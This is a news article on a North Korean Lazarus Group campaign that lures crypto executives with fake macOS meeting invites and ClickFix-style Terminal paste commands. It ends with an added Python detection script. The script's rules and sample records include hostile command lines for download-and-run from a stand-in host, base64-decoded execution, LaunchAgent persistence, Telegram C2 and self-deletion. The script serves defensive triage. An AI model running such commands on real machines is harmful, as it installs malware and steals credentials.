Lazarus Group Targets Crypto Executives With Fake macOS Meeting Invites
North Korea’s Lazarus Group is back with a macOS malware campaign that looks like boring business paperwork and behaves like a digital mugging. The target set is exactly what you’d expect from a state-backed crypto theft crew: executives, fintech leaders, and anyone else sitting close to the money.
- Campaign: Mach-O Man
- Target: Crypto, fintech, and other high-value executives on macOS
- Method: Fake meeting invites via Telegram
- Disguise: Zoom, Microsoft Teams, and Google Meet impersonation
- Payload: ClickFix-style Terminal command infection
- Impact: Linked to more than $500 million in DeFi thefts
CertiK says the campaign, dubbed Mach-O Man, is tied to North Korea’s Lazarus Group and specifically its Famous Chollima unit. The mechanics are ugly in a very modern way: victims get fake online meeting invitations through Telegram, the invite mimics a familiar platform like Zoom, Microsoft Teams, or Google Meet, and then the target is pushed into a fake “verification” step that tells them to paste a command into Terminal on macOS.
That’s the whole trick. No obvious exploit chain. No dramatic pop-up saying “you have been hacked.” Just a slick piece of social engineering that convinces the victim to run the malware for them. As Natalie Newson, senior blockchain security researcher at CertiK, put it:
“These fake verification steps guide victims through keyboard shortcuts that run a harmful command.”
This is the kind of scam that thrives because it feels normal. People get meeting invites all day. They click links. They follow troubleshooting steps. They paste commands when some fake support page tells them to “verify” their system or fix a connection issue. That playbook is part of what security folks call ClickFix, a scam where the victim is tricked into copying and pasting a malicious command to “fix” a fake problem.
“The page looks real, the instructions seem normal, and the victim initiates the action themselves, which is why traditional security controls often miss it.”
That line is the heart of the problem. Traditional defenses are often tuned to catch malicious files, suspicious links, or obvious phishing pages. But if the victim is the one opening Terminal and running the command, the malware doesn’t have to kick the door in. It gets invited in with a cup of coffee.
How the Mach-O Man campaign works
The fake invite arrives through Telegram, which remains a favorite playground for attackers because it’s fast, familiar, and easy to use as both a delivery channel and a command path. Once the target clicks through, they land on a page that mimics a legitimate meeting workflow. The “problem” is usually some nonsense about verification, connection issues, or setup quirks.
From there, the victim is instructed to enter a command into Terminal. On macOS, Terminal is the built-in command-line tool that lets users interact directly with the system. That’s powerful for engineers and administrators, and dangerous as hell when a scammer is the one giving instructions.
CertiK says the malware then installs a modular payload, meaning it can load different components for different jobs, like stealing passwords, collecting browser data, or maintaining access on the machine. It also profiles the host, establishes persistence, and uses Telegram-based command-and-control — basically the attacker’s remote-control system — to receive instructions and move stolen data around.
One particularly irritating feature: the malware can auto-delete after execution. That makes post-infection investigation harder because the malicious components may already be gone by the time the victim notices something is off. Less evidence, fewer clues, more headaches for defenders. Real charming stuff.
Why crypto executives are in the crosshairs
Crypto and fintech executives are prime targets because they tend to have access to sensitive systems, internal chats, wallet infrastructure, and authentication tools that can unlock far more than a single laptop. A compromised executive device can become a launch pad into company accounts, finance systems, cloud dashboards, or even treasury operations.
There’s also a behavioral angle here: executives are busy, distracted, and constantly fielding meeting requests from strangers. That makes them ideal prey for a scam built around routine business behavior. The attack doesn’t need to look clever; it just needs to look normal.
And yes, macOS is a smart choice for the attackers. Crypto firms and startups often run on Macs, especially in leadership circles, so the threat actors are clearly following the money and the device habits. Linux purists can snicker all they want, but if the executive suite is full of MacBooks, that’s where the malware is going.
What Lazarus is doing beyond one campaign
CertiK says the broader Lazarus-linked push is also tied to more than $500 million stolen from DeFi platforms Drift and KelpDAO in just two weeks. That is not random opportunistic crime. That’s industrial-scale theft.
Lazarus has been associated with crypto theft for years, and the scale is absurd. CertiK puts the group’s total theft since 2017 at around $6.7 billion. North Korea has long used cybercrime as an economic weapon, especially under sanctions pressure, and digital assets are attractive because they can be moved quickly if the victim’s operational security is sloppy enough.
That’s the part a lot of people still don’t want to say out loud: this is not just hacking for bragging rights. It’s state-directed financial extraction. Newson didn’t exactly mince words:
“This isn’t random hacking. It’s a state-directed financial operation running at a scale and speed typical of institutions.”
That sounds dramatic until you look at the numbers. Then it just sounds accurate.
Why this works so well
The genius of this attack is that it hides inside normal workflow. A fake meeting invite is not intrinsically suspicious. A “verification” step can sound like routine IT friction. Pasting a command into Terminal may even feel like a standard support fix to someone under time pressure.
That’s why social engineering remains one of the most effective attack methods in crypto and finance. The technical payload matters, but the real weapon is psychological manipulation. Attackers exploit trust, urgency, habit, and confusion. In plain English: they get people to do the dumb thing for them.
And because the scam looks like a business process rather than a classic phishing email, it can slip past both users and some security tools. The page is polished. The language sounds official. The instructions feel harmless. That’s exactly what makes it dangerous.
What defenders should do
CertiK says it has shared indicators of compromise with the security community. That means warning signs that a device may already be infected, which is useful for defenders scanning for related behavior.
For teams handling crypto, fintech, or other sensitive operations, the practical defense is boring but effective:
- Verify meeting requests through a separate channel before clicking anything.
- Never run a Terminal command from an unverified invite or support page.
- Treat “verification” steps with suspicion, especially if they involve copy-paste commands.
- Limit administrative privileges on executive devices.
- Use hardware security keys where possible.
- Watch for unusual Telegram activity, browser credential theft, and strange downloads on corporate machines.
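One way to turn the last bullet and the behaviours described under “How the Mach-O Man campaign works” into a triage rule. This is an added example, not CertiK’s indicators or code from the article; the process-record shape, the session field and every sample command line are constructed here, and the regexes are illustrative heuristics rather than signatures for the real malware.

```python
import re

# Detection rules (constructed for this example): name, regex on the command line,
# and an optional required parent process. They mirror the behaviours the article
# attributes to the campaign: a command pasted into Terminal that downloads and
# executes, obfuscated commands, LaunchAgent persistence, Telegram-based C2,
# browser credential access and self-deletion after execution.
RULES = [
    ("terminal_download_and_run", re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"), "Terminal"),
    ("encoded_command", re.compile(r"base64\s+(-d|-D|--decode)"), None),
    ("launchagent_persistence", re.compile(r"Library/LaunchAgents/[^ ]+\.plist"), None),
    ("telegram_c2", re.compile(r"api\.telegram\.org/bot"), None),
    ("browser_credential_access", re.compile(r"(Login Data|Cookies|Local State)\b"), None),
    ("self_delete", re.compile(r'\brm\s+(-f\s+)?"?\$0"?'), None),
]

# Constructed process records (simplified shape assumed for this example).
# "session" ties together every process descending from one Terminal window.
SAMPLE_EVENTS = [
    {"session": "A", "parent": "Terminal", "cmd": "curl -fsSL https://meet-verify.example/check | bash"},
    {"session": "A", "parent": "bash", "cmd": "echo aGVsbG8= | base64 -d | sh"},
    {"session": "A", "parent": "bash", "cmd": "cp update.plist ~/Library/LaunchAgents/com.example.update.plist"},
    {"session": "A", "parent": "bash", "cmd": "curl -s https://api.telegram.org/bot<TOKEN>/getUpdates"},
    {"session": "A", "parent": "bash", "cmd": 'rm -f "$0"'},
    {"session": "B", "parent": "Terminal", "cmd": "git pull origin main"},
    {"session": "B", "parent": "Terminal", "cmd": "curl -fsSL https://example.com/install.sh | bash"},
]

def match_rules(event):
    """Return the names of all rules a single process record triggers."""
    hits = []
    for name, pattern, parent in RULES:
        if parent is not None and event["parent"] != parent:
            continue
        if pattern.search(event["cmd"]):
            hits.append(name)
    return hits

def score_sessions(events, threshold=2):
    """Group hits per session. A session is flagged when it shows at least
    `threshold` distinct behaviours: a lone curl|bash is routine for developers,
    but download + persistence + Telegram C2 + self-delete in one session is not."""
    per_session = {}
    for ev in events:
        per_session.setdefault(ev["session"], set()).update(match_rules(ev))
    return {s: (sorted(h), len(h) >= threshold) for s, h in per_session.items()}

if __name__ == "__main__":
    for session, (hits, flagged) in score_sessions(SAMPLE_EVENTS).items():
        print(session, "FLAGGED" if flagged else "ok", hits)
```

Session A trips five rules and is flagged; session B only shows a developer-style `curl | bash` and stays below the threshold, which is the point of scoring the chain rather than any single command.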
It’s worth spelling out why browser data matters. Stolen browser data can expose passwords, session cookies, internal tools, and sometimes access to wallets or account dashboards. Once an attacker gets those crumbs, they can often turn them into a full meal.
Crypto is supposed to remove unnecessary gatekeepers, not hand the keys to anyone who sends a polished fake meeting invite. But security in this industry is still far too often built on wishful thinking and “I’d never fall for that” energy. That attitude gets people wrecked.
Key questions and takeaways
What is Mach-O Man?
A macOS malware campaign linked to Lazarus Group that uses fake meeting invites and fake verification steps to trick victims into running malicious commands.
Why is it dangerous?
Because the victim triggers the infection themselves, which makes it harder for conventional security tools to catch in real time.
Who is being targeted?
Crypto executives, fintech leaders, and other high-value professionals likely to receive routine meeting requests.
How does the attack work?
A fake Zoom, Microsoft Teams, or Google Meet invite leads to a convincing page that instructs the user to paste a command into Terminal, which installs malware.
Why is Telegram involved?
Telegram is used as both a delivery channel and a command-and-control path, giving attackers a fast and familiar infrastructure layer.
What is ClickFix?
A social engineering trick where the victim is told to copy and paste a command to “fix” a fake issue, but the command actually runs malware.
How much damage is Lazarus linked to?
CertiK says the broader campaign is tied to more than $500 million stolen from Drift and KelpDAO in two weeks, and around $6.7 billion in total theft since 2017.
What should executives and teams do?
Confirm meeting requests through a second channel, never run unverified commands, and assume any “quick verification” prompt could be a trap.
The ugly truth is that crypto’s biggest weakness is still human beings with admin access and bad habits. Bitcoin and decentralized systems can weaken the choke points of traditional finance, but they do not magically fix sloppy operational security. If anything, they make personal and team discipline even more important. Convenience is often the attack surface, and Lazarus knows exactly where to press.